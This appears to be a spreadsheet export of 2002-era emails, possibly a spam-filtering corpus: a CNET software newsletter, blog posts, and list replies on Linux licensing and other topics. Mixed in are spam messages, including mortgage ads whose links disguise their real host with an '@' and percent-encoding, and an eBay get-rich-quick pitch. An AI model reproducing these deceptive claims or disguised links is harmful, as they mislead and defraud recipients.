    8. Internet Explorer 5.1.4                2,229 downloads
    9. Marine Aquarium 0.99.0                 1,837 downloads
   10. Internet Explorer (OS X) 5.2.1         1,820 downloads
 For more details on Download.com's most popular files, click
 here: http://clickthru.online.com/Click?q=ec-MHyXQVy2Fg64heA1kOqFb2GVaGyR 
 ______________________________________________________________
 2. Pick of the Week
    MARINE AQUARIUM
    Version: 0.99.0
    File size: 3MB
    License: Free to try; $12.95 to buy
    Minimum Requirements: Mac OS X
    As the name suggests, this program puts an incredibly
    realistic aquarium of saltwater fish on your screen. You can
    select from a variety of highly textured fish to swim across
    your desktop, and you can control variables such as lighting
    and the number of fish. There is even a starfish that you can
    track over time to watch how it adapts to its environment.
    http://clickthru.online.com/Click?q=01-9oXDI2jHs5fAjPfvurMPGPxZ6RlR 
    Want to review Marine Aquarium? Submit your opinion here:
    http://clickthru.online.com/Click?q=17-agitI5XroKlI4b9Iz4s1RhjGRseR 
    Find all of our Picks here:
    http://clickthru.online.com/Click?q=2c-DatOIc0DRUD42bbc-r7MBvWpjuyR 
 ______________________________________________________________
 3. The Week in Wares
    IN MULTIMEDIA AND DESIGN:
    QUICKTIME
    Version 6.0
    File size: 402K
    License: Free
    Minimum requirements: Mac OS 8.6/9.x or Mac OS X
    The latest version of Apple's premiere media application
    supports the increasingly popular MPEG-4 codec for high-
    quality, highly compressed video, as well as modern formats
    such as AAC (Advanced Audio Codec) and JPEG 2000. It also
    provides skip protection, an enhanced user interface with a
    more intuitive and useful Favorites menu, new developer APIs,
    and other useful features such as support for Flash 5 files.
    http://clickthru.online.com/Click?q=41-qqJ1IEKIeDjNLmwU5CfCkxHB0FFR 
    Want to review QuickTime? Submit your opinion here:
    http://clickthru.online.com/Click?q=56-NwKYInnsvJh4BuHrctPQDwwaMC9R 
    CARTOON EDITOR
    Version: 1.2.1
    File size: 2.38MB
    License: Free
    Minimum requirements: Mac OS X
    Cartoon Editor won't turn you into a gifted cartoonist
    overnight. But what this graphic editor will do is make quick
    work of creating short QuickTime movies and animated GIFs--
    and for OS X freeware, it doesn't get much better than that.
    Cartoon Editor lets you draw or import JPEGs and GIFs, which
    you can then manipulate with a set of tools that lets you
    group, scale, duplicate, ghost, and all sorts of other useful
    cartoony things. The program's Java2D foundation allows for
    some surprisingly powerful features, like gradients,
    antialiasing, splining, and transparencies.
    http://clickthru.online.com/Click?q=6b-8g5ZIHEcOAstO5H80ywQ-4d0P6cR 
    Want to review Cartoon Editor? Submit your opinion here:
    http://clickthru.online.com/Click?q=80-KTKvQQ0KYe11T0DoaDkjVsTLZ8iR 
    Find all of the latest multimedia and design software here:
    http://clickthru.online.com/Click?q=95-XdwrQvdJfe0atPOr1yZeU_u_KnPR 
    IN HOME AND EDUCATION:
    MOONDOCK
    Version: 1.2.2
    File size: 1.95MB
    License: Free
    Minimum Requirements: Mac OS X
    Get in touch with the natural rhythms of our solar system
    with MoonDock, a simple piece of software that tracks the
    phases of the moon for you and displays lovely images of our
    planet's companion satellite on your desktop. The images are
    high-quality color photos that change over time in accordance
    with the date. MoonDock includes both astronomical and survey
    data, meaning that you can calculate the appropriate moon
    phase for a particular date and identify topographical
    features on the moon using a built-in catalog of those that
    have been surveyed by astronomers and astronauts. This update
    incorporates improved help features and a few bug fixes.
    http://clickthru.online.com/Click?q=aa-gBteQXUr_tMV_meWLXZBXqONOVnR 
    Want to review MoonDock? Submit your opinion here:
    http://clickthru.online.com/Click?q=bf-JtRfQ8Zrg9xPaKu5w8PF_jEuwteR 
    Find all of the latest home and education software here:
    http://clickthru.online.com/Click?q=d4-E0SqQ0ExoPq8KVw_4Mc3148lk6yR 
    IN DEVELOPMENT TOOLS:
    WEBDESIGN
    Version: 1.6
    File size: 1.5MB
    License: Free to try; $28.95 to buy
    Minimum Requirements: Mac OS 9.x through Mac OS X 10.1.5
    Web designers have an array of software choices, from writing
    straight code in something like SimpleText to automating
    everything via drag-and-drop programs that keep HTML at arm's
    length. WebDesign offers a happy medium, with a significant
    number of nice extras. You can drag-and-drop from menus or
    edit your syntax line by line; build image maps and forms
    with relative ease; and work with a full selection of tools
    for site-wide color scheme changes, text manipulation, and
    localization. WebDesign supports both HTML and XHTML, along
    with JavaScript, tabs, and Cascading Style Sheets. This new
    version lets you view your designs as they will be seen with
    various browsers, and has more stable editing and FTP tools.
    http://clickthru.online.com/Click?q=ea-fjLyQhV4XV54QHSAwQ4lAUw-5WnR 
    Want to review WebDesign? Submit your opinion here:
    http://clickthru.online.com/Click?q=ff-sVoVQms4mycg6wFZxrhBm0WHtheR 
    Find all of the latest development tools here:
    http://clickthru.online.com/Click?q=14-5MRAIF-zGNg8yFP8ZvQIzTKtR1yR 
    IN GAMES:
    SIGMA CHESS LITE
    Version: 6.01
    File size: 2.94MB
    License: Free
    Minimum Requirements: System 7.x
    Put your mind to the test with this customizable chess game.
    Sigma is OS X-native and lets you develop your skills through
    levels with adjustable difficulty and customizable pieces and
    boards. What's more, Sigma offers advanced features such as
    printing functions, player rankings, and the ability to
    record and collect your matches.
    http://clickthru.online.com/Click?q=29-Sg_rIjMAh2p0eOyNyGEI9rCM8vlR 
    Want to review Sigma Chess Lite? Submit your opinion here:
    http://clickthru.online.com/Click?q=3e-F51nIizXmE6GxOG_7DQESNPe-i4R 
    Find all of the latest games here:
    http://clickthru.online.com/Click?q=53-n86dINn6Z4onc-PjHpx8lOheMncR 
 ______________________________________________________________
 4. Updates &amp; Drivers: Stay on Top of Bug Fixes and New Features
    IN INTERNET:
    - Internet Explorer (OS X) 5.2.1
      http://clickthru.online.com/Click?q=68-iM8qIsPPH1noIAYywvjsK-FdLPRR 
    - mDialog 1.5
      http://clickthru.online.com/Click?q=7d-FFEqIDLPzooVNqPUywq2NRJSBTZR 
    - Email Magician 1.9
      http://clickthru.online.com/Click?q=92-ubRVQTzT5OEFHMGzeFOPq1FsnynR 
    IN MULTIMEDIA &amp; DESIGN:
    - Audacity 1.0
      http://clickthru.online.com/Click?q=a7-fR_2Q8BwVK0bvAKLF5vLk7KCgFeR 
    - Audion 3.0
      http://clickthru.online.com/Click?q=bd-c0nUQ7py5LqbJMqpAEVgnfqGsJPR 
    - Audion (OS X) 3.0
      http://clickthru.online.com/Click?q=d2-THo_QULw1K18AlW3Gl22vbAOyenR 
    IN UTILITIES:
    - MacAnalysis 2.2.1
      http://clickthru.online.com/Click?q=e7-2y-GQmVXoNS0Rb0VqS8CMB0qvseR 
    - SpeedRun 1.1
      http://clickthru.online.com/Click?q=fc-WpHmQVwFSZlZa-Pa9-0t3VVat9yR 
    - DockFun! 3 preview 1
      http://clickthru.online.com/Click?q=11-l8riI2-4EmyuB-jX3VynhNBuCqlR 
    IN BUSINESS AND FINANCE:
    - OmniGraffle (OS X) 2.0.5
      http://clickthru.online.com/Click?q=26-KqPVIiMHorsZwJdBBBkqU8niQ74R 
    - Sambucus 2.0.1
      http://clickthru.online.com/Click?q=3b-XhxVINdHn73JEjnFPcZsjpRp-LrR 
    IN HOME AND EDUCATION:
    - Blues Music 1.0
      http://clickthru.online.com/Click?q=50-M_CBIR0XguMCAewASOnO8CtmMgRR 
    - Dramatica Pro 4.0
      http://clickthru.online.com/Click?q=65-K82zIDPtIzc8RGwD70VOf0m8P9ZR 
    - iNotePad 1.6.1
      http://clickthru.online.com/Click?q=7a-EE_AIPBjUlSulSvhU6coezkBZXdR 
 _______________________________________________________________
 5. The Week in Reviews:
    A TiVo-like toy for the Mac?
    A Macintosh software company plans to launch Monday the first
    consumer personal video recorder for Mac aficionados.
    http://clickthru.online.com/Click?q=8f-OOYvQ8KKwfwRqEUXvsg9tyQFWveR 
 _______________________________________________________________
 6. Overheard on Download.com
    Here are some user comments about a Mac game that takes you
    back to the days of hanging out at the arcade:
    "Cool!"
    "An arcade classic!!!"
    "Great fun without violence!"
    "Addicting!!!!"
    "Excelente"
    So what's the name of this mystery download? Click here to
    find out:
    http://clickthru.online.com/Click?q=a5-DyaHQ7ZTaQfujbpsIC1b2OB8OEPR 
 _______________________________________________________________
 The e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com
 To sign up for more CNET newsletters, click here:
 http://nl.com.com/servlet/url_login?email=&amp;brand=cnet
 To unsubscribe, click here:
 http://clickthru.online.com/Click?q=ba-m-e5rUpfTfmrcJ0ghqSMlcoEWYe2yRRR
 To receive your newsletter in HTML format, click here:
 http://nl.com.com/servlet/url_login?email=&amp;brand=cnet
 For the CNET Newsletters FAQ, click here:
 http://clickthru.online.com/Click?q=cf-ebM-QLw2HM7JIXMJaylIO7r3fxeR 
 To learn about advertising opportunities in CNET Newsletters, click here:
 http://clickthru.online.com/Click?q=e4-ABYFQVkWG2Bq9mbI81u0PT_Qv1yR 
 Copyright 2002 CNET Networks, Inc. All rights reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: p2p is not a crime
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000615
 Date: 2002-09-25T17:11:31-06:00
 You can see Cory Doctorow explain the problems with the Berman Bill while his 
 host subscribes to the EFF Action Center on TechTV[1] if you've got Windows 
 Media Player. If you're on Windows, you can also hear them. (The Mac version 
 doesn't seem to have the codec for the sound.) 
 [IMG: http://www.archive.org/images/P1010028-s.jpg][2]
 The Internet Archive Bookmobile, starring the Kahles[3]. 
 Seth[4]: "I had a dream that I went to D.C. to hear the Eldred argument and 
 also dropped by a party to celebrate it. [...] y dream Supreme Court was 
 definitely going to reverse the court below, if only because the Solicitor 
 General in my dream had hardly found anything good to say about the CTEA. _
 Adsit omen! _"
 Donna of Copyfight linked to my fair use notes[5]. 
 An archived stream of the Tauzin hearing will be available soon[6].
 [1] http://www.techtv.com/screensavers/opinion/story/0,24330,3399006,00.html
 [2] http://www.archive.org/images/P1010028-m.jpg
 [3] http://www.kahle.org/Brewster/
 [4] http://vitanuova.loyalty.org/2002-09-24.html
 [5] http://www.corante.com/copyfight/20020901.shtml#7432
 [6] http://energycommerce.house.gov/107/hearings/09252002Hearing719/hearing.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Quick, Outlaw Touching
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Tom,
 Monday, October 7, 2002, 4:45:02 PM, you wrote:
 T&gt; I know I heard of this a few years back but Wired and Slashyrot are both
 T&gt; running stories on 10mbs data transfer via human touch.
 T&gt; Oh I can see it now, The first bicostal file exchange system that will see
 T&gt; the newsest Offspring tunes distribute by handshake, copulation and
 T&gt; moshpiting.
 T&gt; http://www.newscientist.com/news/news.jsp?id=ns99992891
 T&gt; http://www.news.com.au/common/story_page/0,4057,5239758%255E13762,00.html
 T&gt; http://slashdot.org/articles/02/10/07/0238234.shtml?tid=100
 Wow.  I'm just wondering how the earliest adopter of all new
 technologies, the porn market will spin this one...
  "New... Now you can transfer porn while you screw!'  Talk about
  exchanging energy.
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] SUSE 8 disks? (thread changed slightly)
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Paul Linehan (plinehan@yahoo.com):
 &gt; I'm confused. I thought it was GPL'ed and that the money you paid SuSE
 &gt; was for your 60 day support or whatever? 
 Yes, you're confused.
 A Linux distribution (_any_ Linux distribution) contains lots and lots
 of separate codebases.  Some are under the GNU GPL.  Many are not.  Are
 you clear on this point, now?  This is my second try.  One suspects that
 you actually understand perfectly, but just don't like it.
 You're further confused if you think the GNU GPL gives you the right to
 get covered software for free.  It does not.  It provides that _if_
 you've lawfully received a copy of the covered binary version, you have
 rights to also receive the matching source code.
 &gt; I don't particularly need support, so I'm not really interested in
 &gt; purchasing a set of disks with 4 billion apps which I'll never use.
 Then, if you nonetheless want a SuSE boxed set's contents, the only way
 you can do that without copyright violation _and_ without having to pay
 the purchase price is to get someone to _give_ (not "lend" or duplicate) 
 you his copy.
 &gt; Yes, thanks for your input. Anyway, I've a friend with 7.3 pro, so
 &gt; I'll just ask him.
 Ask him _what_?  If you're asking him to "lend" or duplicate his CDs,
 then you'll be ripping off SuSE Linux AG illegally.
 Don't like SuSE's product licensing?  Write your own distribution.  You
 can even grab most of what you need _from SuSE_.  All you have to do is 
 heed the licensing terms on the individual pieces.
 What, you think that's too much work?  Then, try a different
 distribution.  Clue:  _Not_ one packaged in a retail boxed set.  Even RH
 7.3 retail boxed sets include non-freely redistributable applications on
 the Star office 5.2 CD and the Productivity Applications CD, among
 others.  (The core 3-CD set of the basic RH distribution, on the other
 hand, contains only software that may be freely redistributed, whether 
 open source or not.)
 -- 
 Hi! I'm a .signature virus! Copy me into your ~/.signature  to help me spread.
 Hi!p I'm a .signature spread virus! Copy into your ~/.signature to help me
 Hilp I'm .sign turepread virus! into your ~/.signature! help me! Copy
 Help I'm traped in your ~/signature help me!       -- Joe Slater
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mac OS X browsers
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/07.html
 Date: 2002-09-07T22:25:08-08:00
 Rael is plagued by MSIE instability on Mac OS X. I use a recent nightly build 
 of Chimera as my default browser. 0.4 has some issues with plugins (or with 
 QuickTime anyway) on 10.2, but the 0.5 builds are working great. Fast too! 
 Mozilla is ugly. MSIE is slow and unstable. Opera (on OS X) doesn't render too 
 many pages. OmniWeb and iCab are not keeping up. Chimera rocks. I have used 
 ChimeraKnight to do the updating. It also makes...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save $30k even if you've refi'd           1090
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face=3D"Arial" color=3D"#FF0000"&gt;&lt;b&gt;Attention U.S. HomeOwners&lt;/b&gt;=
 &lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;If you want to save an extra $30,000 (average s=
 avings)&lt;/b&gt;&lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;on your mortgage even if you have already refin=
 anced&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.Smartest_Move_U_Could_Make.com%40w%77%77%2E%74%65=
 %72%72%61%2Ee%73/pe%72%73o%6E%61%6C9/chunk102/"&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;CL=
 ICK HERE&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;We also have the lowest rates and most professi=
 onal&lt;/b&gt;&lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;and friendly service you will experience.&amp;nbsp;=
  We will&lt;/b&gt;&lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;answer your questions with no obligation.&lt;/b&gt;&lt;/=
 font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.Mortgage_Opportunity_777.com%40w%77%77%2E%74%65%7=
 2%72%61%2Ee%73/pe%72%73o%6E%61%6C9/pants105/"&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;CLIC=
 K HERE&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;We have rates as low as 4.65% and Loans for all=
 &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;types of people and situations.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;For those of you who have a mortgage and have b=
 een&lt;/b&gt;&lt;/font&gt; &lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;turned down we can still save you around $30,00=
 0.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;&lt;a href=3D"http://www.Smartest_Move_U_Could_Mak=
 e.com%40w%77%77%2E%74%65%72%72%61%2Ee%73/pe%72%73o%6E%61%6C9/chunk102/"&gt;CL=
 ICK HERE&lt;/a&gt; for a FREE, friendly
 quote.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;If you no longer wish to receive our offers and updates &lt;a href=3D"http=
 ://www.Remove_Me_777.com%40w%77%77%2E%74%65%72%72%61%2Ee%73/pe%72%73o%6E%6=
 1%6C9/magno102/"&gt; click here&lt;/a&gt;&amp;nbsp;&lt;br&gt;
  and we will promptly honor your request.&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Wow, if they put a VRML front end on it it would be 100% worthless rather
 than just 99%
 IRC...Bots....scripts.....been there done that and much better.
 If these folks actualy saw the xddc instafilesharing scripts must 12 year
 olds hang off of Mirc  they might get a clue, then again they might
 already have teh clue that sometimes you can packege the obvious and sell
 it to the clueless.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Canadians
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy:
 &gt;If we had more variety of franchise food than
 &gt;the Wendys/KFC/PizzaHut/TacoBell/TimHorton's monopoly .. The USA is a 
 &gt;nation founded on creative free enterprise entrepreneurs; Canada
 &gt;is a nation built on monopolies.
 Things aren't all that bad. I remember Vancouver
 as having a broad variety of good, local eateries.
 And Toronto as having a variety of good, local
 strip joints. ;-) I never ate a doughnut in
 Canada, so I cannot vouch for their quality. I
 could live in either of these cities quite happily,
 but Carolyn doesn't like cold weather.
 Personally, I almost never eat at a franchise
 restaurant. Usually you can find better fare or
 cheaper fare (and often both!) at a local
 restaurant.
 _________________________________________________________________
 Join the worlds largest e-mail service with MSN Hotmail. 
 http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Food bits
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 15 Aug 2002, Adam L. Beberg wrote:
 --]You are what you eat :)
 Thus we are what Alton Brown tells us we are.
 Food Heat BROWN
 all praises and braises.
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: Australian Catholic Kiddie Perv Steps Aside
</t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "D.McMann" &lt;dmcmann@b...&gt; wrote:
 &gt; Robert Moaby, 33, who sent death threats to staff, was also jailed
 &gt; for hoarding indecent pictures of children on his home computer.
 &gt; =========
 &gt; 
 &gt; Hmm, if I didn't trust our government and secret police, I could 
 look at
 &gt; this another way....
 There is a bit of circumstantial evidence - apparently some MT 
 listers were approached by him (via email) - a little research in 
 dejanews/google groups showed a number of messages from him, clearly 
 hoping to contact girls, appearing in "alt.teens" and similar groups -
  I just tried a Google Groups search on "Robert Moaby" and some of 
 them came top of the list.
 Note for Marie - "MT" stands for Mark Thomas, a slightly slimmer, UK 
 version of your Michael Moore - the mailing list is named after him. 
 Rob
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: &lt;---- FREAK ME ----&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;
 &lt;/HEAD&gt;&lt;BODY&gt;&lt;CENTER&gt;
 &lt;A href=3D"http://reallymarket.com/user0201/index.asp?Afft=3DQM99"&gt; 
 &lt;IMG src=3D"http://61.129.68.17/mortad2.gif" border=3D0&gt;&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;FONT face=3DArial,Helvetica color=3D#000000 size=3D1&gt;
 Copyright 2002 - All rights reserved&lt;BR&gt;&lt;BR&gt;If you would no longer like us=
 to contact you or feel that you have&lt;BR&gt;received this email in error, 
 please &lt;A href=3D"http://reallymarket.com/light/watch.asp"&gt;click here 
 to unsubscribe&lt;/A&gt;.&lt;/FONT&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: eBay, Be Debt Free by 2003!                      8119
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type"
 content=3D"text/html; charset=3Diso-8859-1"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;div align=3D"center"&gt;&lt;center&gt;
 &lt;table border=3D"0" cellpadding=3D"5" width=3D"90%"&gt;
     &lt;tr&gt;
         &lt;td width=3D"100%"&gt;&lt;hr&gt;
         &lt;p align=3D"center"&gt;&lt;font color=3D"#FF0000" size=3D"5"
         face=3D"Arial"&gt;&lt;strong&gt;EBAY AUCTION NEWS&lt;/strong&gt;&lt;br&gt;
         &lt;/font&gt;&lt;font color=3D"#0000FF" face=3D"Arial"&gt;&lt;strong&gt;**
         Recommended Resource - Special Edition **&lt;/strong&gt;&lt;br&gt;
         &lt;/font&gt;&lt;font face=3D"Arial"&gt;&lt;strong&gt;Monday, August 26th, 2002&lt;/str=
 ong&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;hr&gt;
         &lt;h3 align=3D"center"&gt;&lt;font color=3D"#FF0000" face=3D"Arial"&gt;Multip=
 le
         Streams of revenue using eBay and Internet: &lt;/font&gt;&lt;/h3&gt;
         &lt;p align=3D"center"&gt;&lt;font color=3D"#0000FF" size=3D"4"
         face=3D"Arial"&gt;&lt;strong&gt;FREE Auction Profits Toolkit and
         FREE training class&lt;/strong&gt;&lt;br&gt;
         &lt;/font&gt;&lt;font face=3D"Arial"&gt;(For the first 200 respondents)&lt;/font&gt;=
 &lt;/p&gt;
         &lt;p align=3D"center"&gt;&lt;font face=3D"Arial"&gt;&lt;strong&gt;You have
         been selected to participate in this &lt;/strong&gt;&lt;/font&gt;&lt;font
         color=3D"#FF0000" face=3D"Arial"&gt;&lt;strong&gt;FREE&lt;/strong&gt;&lt;/font&gt;&lt;font
         face=3D"Arial"&gt;&lt;strong&gt; offer. &lt;br&gt;
         &lt;/strong&gt;&lt;br&gt;
         This eBay and Internet e-course, live web training
         conference, and Auction Profit Toolkit could easily sell
         for $297 - but it's yours absolutely &lt;strong&gt;FREE&lt;/strong&gt;!
         &lt;br&gt;
         &lt;br&gt;
         This special &lt;strong&gt;FREE&lt;/strong&gt; offer has been brought
         to you by your friends at eBay Auction News. Craig Meyer
         (The Auction Man) has agreed to provide you a &lt;strong&gt;free
         &amp;quot;live&amp;quot; training class&lt;/strong&gt; that you won't
         want to miss.&lt;br&gt;
         &lt;br&gt;
         You might say &amp;quot;Craig Meyer - the Auction Man?&amp;quot;
         That's because most of you remember Craig as the real estate
         guru who in 1997 helped over 2,000 families buy their own
         homes using little or none of their own money. Craig was
         featured on television programs throughout the country
         for this incredible effort. Craig is not one of those get
         rich quick gurus - but a guy who has helped families
         realize the American Dream - I will tell you Craig Meyer
         is the real deal! &lt;br&gt;
         &lt;br&gt;
         Craig and his staff have
         invested hundreds of thousands of dollars and thousands
         of hours testing, testing and more testing - Craig has
         developed an incredible system for making Big Money using
         eBay and the Internet This system will be revealed to you
         in - Craig's brand new live Online Conference - Craig is
         providing a limited number of eBay Auction News subscribers
         the opportunity to attend this conference for &lt;strong&gt;FREE&lt;/strong=
 &gt;!
         &lt;br&gt;
         &lt;br&gt;
         &lt;b&gt;Register for the class:
         &lt;a href=3D"http://64.251.23.141/marketing/auction/index.html"&gt;CLIC=
 K HERE&lt;/a&gt; &lt;br&gt;
         &lt;br&gt;
         &lt;/b&gt;#1 Free &amp;quot;live&amp;quot; Online training class -
         Craig Meyer's Multiple Streams of revenue using eBay and
         the Internet! &lt;br&gt;
         &lt;br&gt;
         &lt;/font&gt;&lt;/p&gt;
         &lt;div align=3D"center"&gt;&lt;center&gt;&lt;table border=3D"1"
         cellpadding=3D"5" cellspacing=3D"0" width=3D"90%"
         bgcolor=3D"#E9E9E9" bordercolor=3D"#0000FF"&gt;
             &lt;tr&gt;
                 &lt;td align=3D"center" width=3D"100%" bgcolor=3D"#0000FF"&gt;&lt;f=
 ont
                 color=3D"#FFFFFF" size=3D"4" face=3D"Arial"&gt;&lt;strong&gt;Sessio=
 ns
                 Start: &lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
                 &lt;td align=3D"center" width=3D"100%"&gt;
                 &lt;table cellSpacing=3D"0" cellPadding=3D"0" border=3D"0"&gt;
                   &lt;tr&gt;
                     &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td&gt;&lt;b&gt;&lt;font size=3D"4"&gt;8/28/2002 - 5:00pm PST - 6:30p=
 m PST&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td&gt;&lt;b&gt;&lt;font size=3D"4"&gt;9/02/2002 - 9:00am PST - 10:30=
 am PST&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td&gt;&lt;b&gt;&lt;font size=3D"4"&gt;9/03/2002 - 5:00pm PST - 6:30p=
 m PST&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td&gt;&lt;b&gt;&lt;font size=3D"4"&gt;9/05/2002 - 9:00am PST - 10:30=
 am PST&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td&gt;&lt;b&gt;&lt;font size=3D"4"&gt;9/09/2002 - 9:00am PST - 10:30=
 am PST&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td&gt;&lt;b&gt;&lt;font size=3D"4"&gt;9/10/2002 - 5:00pm PST - 6:30p=
 m PST&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;td&gt;&lt;b&gt;&lt;font size=3D"4"&gt;Pre-recorded Class (anytime)&lt;/=
 font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;/td&gt;
             &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/center&gt;&lt;/div&gt;&lt;p align=3D"left"&gt;&lt;font face=3D"Arial"&gt;This is
         the live online training class that Started it all ... &lt;strong&gt;Thi=
 s
         class can help YOU learn how to Create Multiple Streams
         of eBay and internet revenue for LIFE!&lt;/strong&gt; This
         course is personally taught online by Craig Meyer
         HIMSELF! PLUS, when you attend, you will get: &lt;br&gt;
         &lt;br&gt;
         &lt;/font&gt;&lt;font color=3D"#0000FF" face=3D"Arial"&gt;&lt;b&gt;The Entire
         Auction Profits Toolkit absolutely FREE! &lt;/b&gt;&lt;/font&gt;&lt;font
         color=3D"#FF0000" face=3D"Arial"&gt;&lt;b&gt;A $297 Value!&lt;/b&gt;&lt;/font&gt;&lt;font
         face=3D"Arial"&gt; &lt;br&gt;
         &lt;br&gt;
         Just think about it ... you will have personal and
         individual training! Craig will be teaching you all of
         his proven, successful, and profitable wealth secrets -
         LIVE, interactive, intense and jam packed with
         information! &lt;br&gt;
         &lt;br&gt;
         Plus - During Craig's live online class he will reveal
         the secret to making $12,000 in the next 30 days - No
         Hype, I promise this is the real deal - you don't want to
         miss this conference so respond right now! &lt;br&gt;
         &lt;br&gt;
         &lt;strong&gt;Are you interested in Financial Freedom? &lt;br&gt;
         Are you interested in having Multiple Streams of Income? &lt;br&gt;
         Are you willing to work with Craig personally to achieve
         these goals? &lt;br&gt;
         Are you ready to the Auction Profit Toolkit and training class &lt;st=
 rong&gt;FREE? &lt;/strong&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;/strong&gt;
         &lt;/font&gt;
         &lt;strong&gt;&lt;font color=3D"#0000FF" face=3D"Arial"&gt;&lt;strong&gt;If SO,
         Just go to the registration page: &lt;/strong&gt;
         &lt;a href=3D"http://64.251.23.141/marketing/auction/index.html"&gt;CLIC=
 K HERE
         &lt;/a&gt;&lt;br&gt;
         &lt;/font&gt;&lt;font face=3D"Arial"&gt;&lt;br&gt;
         Get registered now! You'll receive a confirmation email
         immediately after you register. &lt;br&gt;
